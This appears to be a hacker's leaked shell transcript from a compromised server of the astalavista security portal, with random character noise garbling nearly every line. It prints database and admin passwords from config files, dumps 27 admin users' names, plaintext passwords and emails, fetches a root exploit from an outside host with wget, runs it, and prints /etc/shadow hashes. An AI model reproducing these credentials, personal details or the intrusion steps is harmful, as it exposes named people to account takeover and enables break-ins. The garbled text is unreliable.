drwxr-xr-x 7 astanet astanet 4096 Jan 5 2006 _0mysql8 U0 U o2 b1 X3 z% R9 q; T
drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com: p6 F; O {- N% f# q7 {
drwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend
) ?: S: o' p: E& s4 sdrwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner! v6 u3 R+ l! X
-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg
5 |8 U0 Y* S% `0 A2 xdrwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
6 l" ~$ q4 n3 K4 J ldrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron$ {' y7 F8 j7 {/ ~; E
drwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd
) Z G3 M8 h9 h3 Y, ?/ |-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php
6 K- A, C+ h( h$ \" \* Z! D* s-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico
" p# a" z/ t, D8 O, sdrwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed! Y5 B( m X! Z2 @, h0 m) U
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour
4 h5 x4 h! t9 I! f5 M9 w! [-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess0 P& j) w. u U8 M
-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess- D, J8 }, |. v4 X
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php9 \% W! s9 R1 F. O& _' r4 x# y
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html0 I0 L) Y/ |8 { o; z
-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php7 `0 Y; e. U# U! V
-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php8 {* I% d1 J$ c: Z& J
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
) ~. [5 q$ B; l mdrwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc
$ G; ~% |3 |. Z8 Edrwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang
: g. H% ^3 X3 Idrwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib
9 R- E" k4 @( O3 ]: a edrwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log
$ e+ B! T! Y" o0 _9 x' m7 f3 [+ f0 Ddrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member) Q8 u# Q# y1 I- b: J7 `# t
drwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
" d3 S5 J; M) d$ C. A: jdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new
3 _: o% S7 l9 e) K5 t9 p-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf R* M' Q3 N- _$ k; ^" x" H
drwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re
' Q" p: n- N' S4 S-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt
! d/ {6 D$ h9 P6 p, T# Vdrwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss
! @- W a) c" M. d7 Ldrwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
1 g5 J0 s8 h* s2 ndrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com
0 x! t0 \9 v% Jdrwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes: E2 q, h9 m; T
drwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src
% l1 P5 a- z+ W0 g2 bdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl
& @) |& K- {$ \drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2 y/ k0 T5 p% `. w+ ? `0 l% N N0 W) n
drwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
P+ v" f' M4 I* d-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php* `7 V! H1 P* q6 @5 Q9 j
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki
$ {$ j% t" m2 i% ^( D! h \, V) b. z; S4 L* N
sh-3.2$ head -20 index.php
( Y+ e* Y' x$ O% E9 g% ?<?PHP$ @/ t- h4 }6 c) U( y" r0 g
/**
4 I; j6 \: h d$ h0 S) |* Mainfile (external) for astalavistaNET v2.0" d: A# o( m9 q# W7 [1 }
*% L" w" }: Q. D9 g" z
* @copyright Astalavista IT Engineering GmbH
5 Z2 Q( N% e/ q9 w- Q1 u7 f* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
/ t' a, q7 Q/ k, r7 b- {* @version 1.0; h Y2 T2 \6 A d/ s3 p9 F
*/
" w N8 {( z- E: g: {6 R& P$ s; A9 a: a+ `/ P9 s
if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {- E5 O; j2 v) U3 _
$dontStartSession = false;
) f9 q; ^& z& b. P% C } else {
2 |9 S$ v6 [% G4 K $dontStartSession = true;
; s4 t" j" N w6 ^& f' X. J1 i% \ }- j8 x! m5 n. W$ C- i* |
require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);: r2 O- C% v( q, a
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);9 E# K M; ?8 U p) R5 k
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);2 _, ~; ^2 P: V* v1 G! J
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
$ ^& V7 O" ]5 O1 Y6 E
' L2 _! C& w; ^sh-3.2$ cd config3 T9 c, V# f- j, T" a- J
sh-3.2$ ls -la
/ d! a7 I$ b8 Z5 Stotal 32$ G- A l: l1 y( o5 S( }: w
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .! V: D- c' D% H! Y" @1 d. z
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
3 `/ ~( [# w0 h# M* O, K-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php/ o+ f; t1 V" ]( l* k
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php; _. {% D6 F" C( x8 I5 R0 a1 i
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php8 }$ z7 J: X' J8 b
-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php
2 {- a, K4 z' ]* R7 b4 W-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php
: ?9 K& E% `; {$ i0 n5 o" v; H
4 g2 P% P& E8 p; ^6 Rsh-3.2$ cat com.conf.php
6 o7 Z, ? w% Q5 @5 P4 Y[snip]1 Z( N' d7 t* [/ z9 j- u' a
//member-database
2 |! v* h2 K3 {) M$ F; B% @) I( Z4 N$_CONFIG['db_mem_server'] = ‘localhost’;
8 t# Y; F9 x6 b( k8 G6 u* _$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
9 o' h7 j8 @! Y3 w7 f( M9 m$_CONFIG['db_mem_user'] = ‘astanet_db’;
- P- R# \- \7 e, q: ^: d f$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
% \6 c$ w! N$ a! e8 @2 C$ ?7 p' d$_CONFIG['db_mem_debug'] = false; //true or false" W8 k9 j- J) _
//ads-database
0 V/ v! z i6 G! M# P7 i2 l H$_CONFIG['db_ads_server'] = ‘localhost’;: X6 ?3 F3 v9 ^8 j) o
$_CONFIG['db_ads_database'] = ‘astanet_ads’;2 U$ f3 n6 H: ?' l$ U8 N
$_CONFIG['db_ads_user'] = ‘astanet_db’;- Q" s, \1 ^+ O
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;3 H, f0 b6 q( z/ Q* d* M9 x
$_CONFIG['db_ads_debug'] = false; //true or false
, J# [. b: W: Z1 [6 a j* C8 g+ X5 o//rainbow-database
( v0 Q2 f5 q9 c" m$ c4 M: b$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;# G# @6 d) J0 x* @. r& u9 X5 p
$_CONFIG['db_rainbow_database'] = ‘rainbow’;
* z9 @" I" B% O S$_CONFIG['db_rainbow_user'] = ‘dinu’;5 r/ Z0 e5 A' i
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
% O* `! w0 }7 U( z1 V2 J6 F$_CONFIG['db_rainbow_debug'] = false; //true or false' O M* X$ l- e: s) x) \
//mailing lists database
- f4 h9 E4 y% w* d, ?. v q$_CONFIG['db_mailing_lists_server'] = ‘localhost’;
& R! Z, u" i0 ]* ?$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
4 \5 s! [( b* J1 v% C$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;
8 K) c5 w% {9 z) s j$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;
; {& i' N! n, t9 M+ ~$ t6 P' H$_CONFIG['db_mailing_lists_debug'] = false; //true or false# \" m, z' B( x
//paypal
$ r( |2 }+ Z/ [& v$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
+ T% X) ?% g; A4 I" B0 [2 ^$_CONFIG['sub_pp_cmd'] = ‘_xclick’;; c8 c" I ?+ x4 }+ f' x
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
& P% h% M/ B$ {) S; R% u$_CONFIG['sub_pp_noship'] = ‘1′;
, n% j2 ~' g( p9 u$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;
9 s3 M5 [- X2 x0 P[snip]
4 o N& g, ~5 y, o; l) x
: L9 g* V0 R: _, r1 \sh-3.2$ cd ..+ x! A: f; X8 p+ D
sh-3.2$ cd member
; {$ H. A% @+ t& G8 G! b5 R, _sh-3.2$ ls -la
4 t, N: A0 I6 c5 o2 l% A( \total 202 n3 f6 n7 C' l" [4 K7 S
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
3 `2 j9 X5 c# w( j Wdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
# k9 h7 |2 L& t- I9 e3 F" ?-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
! L. w6 W% ^/ C0 e-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php
, W' \, A+ W, _( e0 c- W# Nsh-3.2$ cat .htaccess
$ [0 u- K+ [3 \! e1 JSecFilterEngine off+ t" [8 P4 ^$ Y- q/ z% P
5 H: Q! Y' g$ N3 y9 U8 g6 @ msh-3.2$ cd .. Y& ?0 ^* w! ~" M! i( d! A) N7 p- ~
sh-3.2$ cd cron
, d6 `0 B( D5 Q6 vsh-3.2$ ls -la
, D( v% M+ G- S, h( Q8 U2 R0 Ptotal 168" A1 v& E" k- V8 L
drwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .) g d3 E: m6 F8 D/ [
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
, q7 w7 U8 S* z/ [$ \/ z-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
3 S. \! b4 S+ u' Y# |+ l-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php+ n6 r) x4 I3 @; S# q
-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php) e8 ?- F5 P& u) B; @% O, _
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php
9 g$ A' f7 h5 R- d) o& L-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php! P- x1 \- ^7 h2 l _8 I
-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
1 ?7 a4 i6 X* m% ]-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php3 _+ d8 S# J1 o3 ^6 U& d D
-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php
- F' d4 ]9 q% e+ ? E-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh+ }! e x2 f- D7 i( \
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php y' F' y# i# v, z- s
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php. z& R H0 s( M9 K: V. \
-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
, I+ g2 T4 s3 N0 r-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh4 V* O |( l3 c1 s5 T$ C2 X& a9 N% [
-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
# s# f1 N( |. Z2 f( B: E-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php5 t* \% M' T) y1 \0 X, S
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php: |2 J4 f( M+ m; r1 C' C
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php
2 k/ b/ G! ~0 _: V' X-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php5 y$ l- w" Y7 I6 p& `9 X4 d
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email
7 }( _: {8 A* i9 p/ K-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
, b7 K, u& w3 _-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php
5 W& U. G9 V( B- A0 u2 T+ v/ x2 D- S# ]1 k0 Q/ z' [
sh-3.2$ cd ..
& M1 a I/ e2 q% y/ l Bsh-3.2$ cd _0073 C9 D4 F- u7 J
sh-3.2$ ls -la2 ~, D. p2 j/ R$ T
total 248 H- R/ w0 x& j/ A" V
drwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .
, b) @9 o5 t& |; hdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..3 {( {. \: B. g$ D) E' V9 F, [# Q
-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess2 m# }$ m# j8 |& G$ o7 w2 \2 G! i
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
V/ H7 l/ |/ Q' z8 J7 H-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
" D4 C; K, g% c' Y2 Odrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap/ y" |: f" V6 V9 N5 \& w7 E- o3 j( F
! q( T% {+ [9 c9 M8 Z
sh-3.2$ cat .htaccess
9 [5 C- z3 d5 JauthType Basic
, K8 h& @- ~) L! ZauthName Admin
! B6 F3 W5 w" GauthUserFile /home/astanet/auth/.htadm_pwd
) k( u6 Z. o/ T1 K8 irequire valid-user
& L6 e+ q. x h3 v; a% p( f8 n: ]5 g! c. o9 s5 V
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
5 d. `# s6 K# z- N* z3 S; F2 K; jadmin2net:CR0bl65MwhfT' m+ X& a$ B+ m1 B6 _+ t
8 s+ r* o+ x8 Q- k- c) @- [sh-3.2$ mysql -u astanet_db -p
; o/ c+ I: \* t8 N' @Enter password:# W, c: b8 p( h( J h' B
Welcome to the MySQL monitor. Commands end with ; or \g.
" l+ ^: l6 @9 DYour MySQL connection id is 275153
. T) I2 y1 n, ]& j: r8 ]% D' JServer version: 5.0.45-community-log MySQL Community Edition (GPL)3 y- `6 J2 \. A6 J+ @
4 d, H- r. n% F7 t$ p* E2 O
Type ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.7 M1 W& ]5 z: w4 Y
6 e$ B3 W# R6 J' ?: d. Rmysql> show databases;: V3 e+ P, c* C. [" r4 T
+———————–+4 t3 H" S a/ d/ _
| Database |7 u8 {! c* n* y
+———————–+ _) J1 p8 I: r8 Q$ N0 D
| information_schema |
7 A3 M$ Q! d6 Q( U- u+ \" t5 e| astanet_ads |* Y3 }+ _% g& S1 a
| astanet_mailing_lists |
* T# _: K' f6 h4 k" d0 {1 B| astanet_mediawiki |" V* }. _# q( h1 A p6 ]
| astanet_membersystem |
' J; k% u, j3 k8 `| test |
: G; E- }# c5 ^$ V) k% P+———————–+$ K# f( `! A' z- T+ w5 x
6 rows in set (0.00 sec)$ J' |/ V. j, T k! B# t
) L! l4 C/ F r! gmysql> use astanet_membersystem" n' o. f1 |3 \, m# G
Database changed
3 f- p$ Y1 c+ W- G% W% U4 W/ f' ^mysql> show tables;. b( Y) s7 c) {
+———————————–+: A3 n# Y' Q4 l# w% Q6 i
| Tables_in_astanet_membersystem |
3 _1 r/ X! r0 L* d0 q4 k+———————————–+
0 Q+ C- T+ q6 ?6 {' p| blacklist_categories |
8 E; p( w; b" g7 l$ B4 a: a| blacklist_content |
/ S7 }0 S' ~, D* e. Z| blacklist_levels |
' w1 m8 }" Z/ a) w0 [6 k/ z7 N. X| blacklist_mcset |
1 w; [, b+ I( g5 c| dir_categories |. o H5 A) ?3 }3 U4 [1 k! h- n
| dir_comments |
1 y, ?1 @+ F; q3 o| dir_links |
5 J0 D, K6 U0 v' o| dir_temp |8 ~7 r+ g! p' q* I( `& {, S$ A a. d7 \
| dir_votes |! k5 i+ Z k% _6 c/ b
| documents |: {8 D) P# t% v, K% C
| documents_categories |/ C) j% a5 }& C s2 G. R6 T
| email_content |& P, X* r) V. M% d8 H4 }6 C
| email_settings |6 o! z2 E2 n, m, x' M
| exploits |* [/ i: {; \: Z5 S* r" e9 }
| exploits_categories |6 d( v" y# s+ E3 J& F
| exploittree_categories |
( S$ P2 ^( M8 N| exploittree_exploits |
. T' k1 }, g. Y| home_values |
5 D" p% E& p% h1 r6 h) F| iso_countries |! l/ k7 q$ N, s. w& I
| links_categories |
+ X- @# D& Q0 s. g| links_records |+ `$ s1 z7 T9 w" j9 b0 A9 B
| links_unauth |4 @! I" R6 W1 K! M
| links_votes |
$ D1 q# c v/ v6 z3 _& F8 u: \: W| log |1 ?2 \4 b8 ^( P! p1 Y
| news_categories |
! f' S: n9 m+ n| news_comments |
, A* U0 D5 w' O+ \| news_emoticons |
! q! _2 {/ w2 n| news_latest |& J: p3 B1 b3 c& K1 S
| news_messages |
0 H3 O$ E9 q: E" p$ w6 B| news_statistics |
8 @) V2 ~" W: ]( `| news_votes |; y8 n. ~3 L( P8 i' ^
| prices_content |- `/ M& c1 `. k5 S% l
| prices_offers |5 ^: p# R7 _8 ?) I, n/ X' Z0 ?
| rss_settings |( T4 N: ?) g6 P% C; J
| sessions |. V9 ]$ r8 o. p
| stats_signups |# j7 [+ {1 d& m
| u2u2 |% o6 [/ J, }" J0 V2 p' j
| u2u_contact |
/ X; B. P! B1 [+ v6 x- p0 s| u2u_settings |) e( L' y5 `+ J8 f! f4 R
| user_keywords_selected_categories | p( {- ^* E! @7 z$ p+ O* L+ F$ R& {
| users |( k# q4 K# Y8 y) E! f6 Y; M2 N6 [$ g- w
| users_ipn_test |: V T2 v1 w+ z4 B. Y% s" f
| users_keyword_values |, ]! u! I* \3 j) Q D) d( @
| users_profile |
# f8 ~' `# h+ x7 G, m1 ~/ v| users_temp | F9 Z& O& B( F) a+ `1 O3 L8 v& s
| users_upgrade |+ v, F( U3 e% A
+———————————–+9 P3 N3 V$ o+ j( f* o6 E4 N4 ?
46 rows in set (0.00 sec)
$ U# C5 {. Y$ C c! u9 w+ M# @3 R0 ?) w6 ^. y) b
mysql> describe users;
. T, P, H" ~: _7 \+————————–+————————————–+——+—–+———————+—————-+
5 P, o8 f% D* |4 w3 A) w| Field | Type | Null | Key | Default | Extra |: _6 i7 G9 V7 x, T9 N9 a
+————————–+————————————–+——+—–+———————+—————-+
8 [; d: p: M6 i/ ^0 ~| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |: Z4 p* R `% ?$ E7 D
| user | varchar(50) | NO | | | |
$ t. Q5 i9 B& G1 M ~7 K2 D% ]| nickname | varchar(30) | NO | MUL | anonymous | |
' w8 e7 R4 s2 k1 j/ }$ z| password | varchar(30) | NO | | | |3 [$ U" M. }. K% s
| userlevel | tinyint(3) | YES | MUL | NULL | |$ S n; a5 F) J) W! G0 s
| exp | int(8) unsigned | NO | | 0 | |" I0 L8 Z1 Q9 C& |) l- i
| email | varchar(50) | NO | | | |" B5 q$ D! d) D/ N% n
| ip | varchar(15) | NO | | 0 | |
* G! D2 X7 L* v% {8 w| proxy | set(’0′,’1′) | NO | | 0 | |/ a9 M3 k% J! C1 `+ A
| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
' O) b9 _3 y' t7 W' q# s& e" E| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |
) f1 y- m/ Q, B0 k) P| anz_in | tinyint(1) | NO | | -1 | |
/ h0 j7 ]* h. u$ f& B. I| status | tinyint(1) unsigned | NO | | 0 | |
& G4 g, i6 e$ l/ k2 ?: c| checked | set(’0′,’1′,’2′) | NO | | 0 | | |+ W1 N# s5 J2 G" M
| freemember | set(’0′,’1′) | NO | | 0 | |' R2 S* T4 [2 M2 C; M: R
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
! I7 G) o& u7 J# s: j8 ]| lang | tinytext | NO | | | |
( I* t& T0 `6 A0 S) n% || adid | smallint(6) | NO | | 0 | |
6 C9 E1 u+ D+ E5 w) R| pp_txn_id | varchar(255) | YES | | NULL | |! s; l& m/ Y9 [* Y" C& t
| cnb_transaction_id | varchar(255) | YES | | NULL | |
) b+ `! `' C2 Z3 v( r, i* J& ~| cnb_order_id | varchar(255) | YES | | NULL | |
O+ `' c& F: W2 a| cnb_user_id | int(11) | YES | | 0 | |
' v5 E; Q" m/ J6 W0 ^& [9 y! V( w+————————–+————————————–+——+—–+———————+—————-+& [, W2 \4 x8 M9 F* X8 _$ z) j$ Q
22 rows in set (0.01 sec)
* N" X3 `% [/ O: W4 J
8 K' Y) z0 F* Umysql> select count(*) as skids from users;* ~0 A7 j: p4 `2 x
+——-+
7 g z* d/ B6 a6 N+ \, g2 R- O| skids |
* m( J& a+ ]4 m: {+——-+& k" x+ N! G6 w7 X' G$ ~
| 25199 |+ Z( q) J, v, v2 |( o8 J
+——-+ E1 a8 w4 I) a$ Z4 L$ D, J, R2 w9 u4 h( V
1 row in set (0.00 sec). `- K O( I! G( c2 m. f( [
( b; E6 P* l6 j; w9 P2 @
mysql> select user,nickname,password,email from users where userlevel = 1;
! E8 k1 p; o0 x L/ M G3 T, H+————————–+———————-+——————+———————————–+' q* p$ Q( s* I6 g
| user | nickname | password | email |
% v/ k* D* P; G+————————–+———————-+——————+———————————–+
9 s6 w3 u4 |* @: [. e5 P1 x) e| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
* O. ?1 P& J# | |, }1 P" T3 r| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |
* P' X. q7 f5 I* x* H; D| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |. c. o! q9 Y1 ^$ |' \
| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |
3 W( j$ M2 \! y) ~& D3 u| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |4 o4 E. |, t, I# _( W2 a6 j
| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
' `0 |; [' H$ S3 Z, ?, E| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
9 o' l& E' R+ Z5 B| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
* ?1 B' }6 R5 V' ]5 G F| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |. u- A1 K. {. J0 H
| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |
- \( `# l: Y7 t| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |% g3 u5 G4 F$ L( T# s# h
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
9 P& C8 u$ O* ]5 V1 d& B| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |
. _! Z* ~" {2 Z( p, W3 d& d: A9 I| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |* {/ z7 z) t3 }6 R: q: b; z6 P
| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
$ `# K) Z' Y3 U| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
2 z {) k( R5 F) K% S| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
+ G, ?6 W8 O) B* I7 F$ H| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |( A, |* H7 |. c, _( Q/ h( @, Z
| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |! w" ~" ~3 F2 M+ Z' Z9 Z
| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |
0 c8 n4 o9 Q+ }% Q* \8 d. o| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |
! }+ E; g9 |3 F7 P| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |
9 k* H9 V" e! P) c8 N' u; E+ C( `| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |, q8 S* p! h$ G& \- y1 Q3 p6 r
| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |
+ `# u1 z/ |7 j| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |0 x9 a. ^. B$ A$ O* h9 F5 {+ O5 f
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
2 `; @; B Z4 x$ g| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |
: c8 y) D& K) G G. Z+————————–+———————-+——————+———————————–+1 E7 B( w4 Z' ~: c1 [8 Z
27 rows in set (0.00 sec)9 J$ V! i3 C# H# T) A9 ^! \
: [ |/ [; o7 f: a4 Z# ?
mysql> exit;$ a: F3 V' E8 `1 [) V
Bye1 ^% K2 f0 @& p
' O4 w, S2 C$ B+ V- v6 Z
[~] plaintext passwords? yes,
2 \8 j. T8 o" A% m( QThose so called “security professionals” who charge you $6.66 / month to
: y+ _% L4 J& z3 b6 Bregister at their hack-proof portal, save your passwords in plaintext…
% ?1 _" _- W8 C0 Mbrilliant!
) b7 O6 T3 U& {& ~ k+ a* I/ x0 K$ ~6 }" H- z8 H3 Z' E. S) G
[~] This been fun but we want more., V1 H( T8 M' ~6 S# L
- L( c) B" X8 M* dsh-3.2$ uname -a! p. C% }" y1 n
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
9 h1 w* }' I' L+ {: ?2 Z4 v8 E8 Rsh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
4 `) T! k% Y# Z) o–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]5 F2 C. c4 E. U( c
Resolving anti.sec.labs… 13.33.33.37
, [1 k. h5 D7 V/ a' fConnecting to anti.sec.labs|13.33.33.37|:80… connected.
( ` X+ p- e* a8 s0 VHTTP request sent, awaiting response… 200 OK% I( Z; Q! Y( o: p
Length: 18200 (18K) [text/plain]* G) Z# s% Y& Q, K
Saving to: `g0troot’
2 z- @) P; I8 |; Q `; ?& r( H5 V) v1 U- l1 Y
100%[=========================================================================================================================================>] 18,200 58.6K/s in
7 s# j: Q' `: k$ t5 h0.3s) I0 Q7 P9 X9 j' i) b
* B' w+ @% k8 l3 @8 F& k, U18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200] u/ w; \& U' H6 ]4 G9 V% j; B, T
0 ?' Y+ b# A, o8 K; H& J3 o4 A4 W
sh-3.2$ ./g0troot -i x86_64
, L: E% ~( q5 G/ [8 V[+] g0troot - anti.sec.labs
* B2 Y5 ~ W" P! K* ^0 ^! x[+] Target: 2.6.18-128.1.10.el51 H" R: P# j& A' O( O& r
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] a1 {' t3 ]! H# }% B% @) m" W: U
# v% o5 M* ^: s
[+] r00tr00t
9 S7 U! n+ l4 U0 Y9 S+ p5 I$ U[~] Executing shell…
( T2 N3 e5 m9 M/ a+ N# H+ w3 P+ Q- [) i E1 @' L7 s
sh-3.2# id
$ O5 h+ j9 Z! E/ Z0 B" tuid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
' N+ Z v, o3 b2 r4 |' C+ V
8 v. V, s5 y2 |4 O% Bsh-3.2# cat /etc/shadow9 O$ j' S7 u7 G0 u6 e
root 1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::
" N" E! _4 z7 b6 ^[snip]
! @* X' s/ O" e, {admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::$ b2 P8 L* f( d
jon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::/ v" ?/ c' D+ {+ \1 f
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::
+ F, ]+ N A5 Y4 `% Mastanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::# k0 O9 \* l" F
+ V+ P2 L7 @6 x; {4 v, x
sh-3.2# cat /etc/motd3 v) L, z7 Q, E5 [
#####################################################
